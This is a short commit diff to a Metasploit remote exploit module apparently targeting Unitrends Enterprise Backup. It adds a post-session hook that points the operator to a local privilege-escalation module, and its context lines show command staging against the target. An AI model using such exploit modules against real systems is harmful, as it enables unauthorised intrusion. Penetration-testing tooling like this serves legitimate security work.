commit
74330f87dc
|
@ -123,5 +123,11 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
print_status("#{peer} - Sending requests to UEB...")
|
||||
execute_cmdstager(:linemax => 120)
|
||||
end
|
||||
|
||||
def on_new_session(session)
|
||||
if target.name == 'UEB < 10.1.0'
|
||||
print_good("A privilege escalation exploit can be found 'exploits/linux/local/ueb_bpserverd_privesc'")
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
|
Loading…
Reference in New Issue